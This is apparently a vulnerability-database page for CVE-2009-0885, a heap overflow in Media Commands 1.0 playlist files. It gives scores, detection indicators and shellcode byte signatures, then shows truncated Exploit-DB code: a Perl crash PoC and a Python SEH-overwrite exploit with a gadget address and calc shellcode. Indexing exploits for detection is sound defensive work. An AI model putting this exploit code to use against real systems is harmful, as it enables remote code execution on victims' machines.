CVE-2009-0885
Published 2009-03-12
Priority P347 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 8.75% (94.5th percentile)
Multiple heap-based buffer overflows in Media Commands 1.0 allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a long string in a (1) M3U, (2) M3l, (3) TXT, and (4) LRC playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mediacommands | media_commands | — | — |
Detection & IOCs (extracted from sources)
bytes: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49
bytes: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49
- Trigger pattern: malicious playlist files (.m3u, .m3l, .txt, .lrc) containing a long string prefixed with 'http://' followed by ~5000 'A' characters cause a heap overflow in Media Commands 1.0
- SEH-based exploit uses a buffer of exactly 4103 bytes of 'A' padding before overwriting the SEH chain in a .m3u file
- SEH overwrite exploit targets pop/pop/ret gadget in msacm32.drv at address 0x722FC635; monitor for SEH chain corruption pointing into this module
- Shellcode stub begins with the encoder stub bytes EB 03 59 EB 05 E8 F8 FF FF FF; scan playlist file content for this byte sequence
- Both PoC and SEH exploit write crafted payload files named with the pattern 'hakxer.<ext>' or 'exploit.m3u'; alert on creation of unusually large playlist files containing high-entropy or NOP-sled content
- The PoC (exploit-db 8135) is a crash/DoS proof-of-concept only; the shellcode variable is named '$CoDe' but the file write uses '$c0de' (undefined), so the written file contains only the crash string and no shellcode; actual code execution requires the corrected SEH exploit (exploit-db 8137)
- The SEH exploit was tested specifically on Windows XP Pro SP2 French; the pop/pop/ret gadget address (0x722FC635 in msacm32.drv) is OS/patch-level specific and will differ on other builds
No detection rules found.
Exploit-DB
Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)
exploitdb·2009-03-02
---
```perl
#!usr/bin/perl #
# Discovered & Coded by : Hakxer #
# Media Commands (M3U,M3l,TXT,LRC Files) Crash PoC #
# Greetz : Allah , ProViDoR , Egyptian x Hacker #
# Team : Egy coders Team #
# Download/http://www.mediacommands.com/download.html#
# Description : #
# Import Hakxer.[Ext] Into program ... #
# Program Get Crashed ;) #
######################################################
my $crash="http://"."A" x 5000;
my $CoDe=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x77\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x79\x79\x6b\x4c\x70".
"\x6a\x78\x6b\x52\x6d\x4
```
Exploit-DB
Media Commands - '.m3u' Local Overwrite (SEH)
exploitdb·2009-03-02
---
```python
#usage: exploit.py
print "**************************************************************************"
print " Media Commands (m3u File) local Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 4103
next_seh = "\xEB\x06\x90\x90"
seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv
nop = "\x90" * 19
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\
```
No writeups or analysis indexed.
- http://osvdb.org/52346
- http://secunia.com/advisories/34122
- http://www.securityfocus.com/bid/33958
- http://www.securityfocus.com/data/vulnerabilities/exploits/33958-2.py
- http://www.securityfocus.com/data/vulnerabilities/exploits/33958.py
- http://www.securityfocus.com/data/vulnerabilities/exploits/33958.rb
- http://www.vupen.com/english/advisories/2009/0583
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49035
- https://www.exploit-db.com/exploits/8135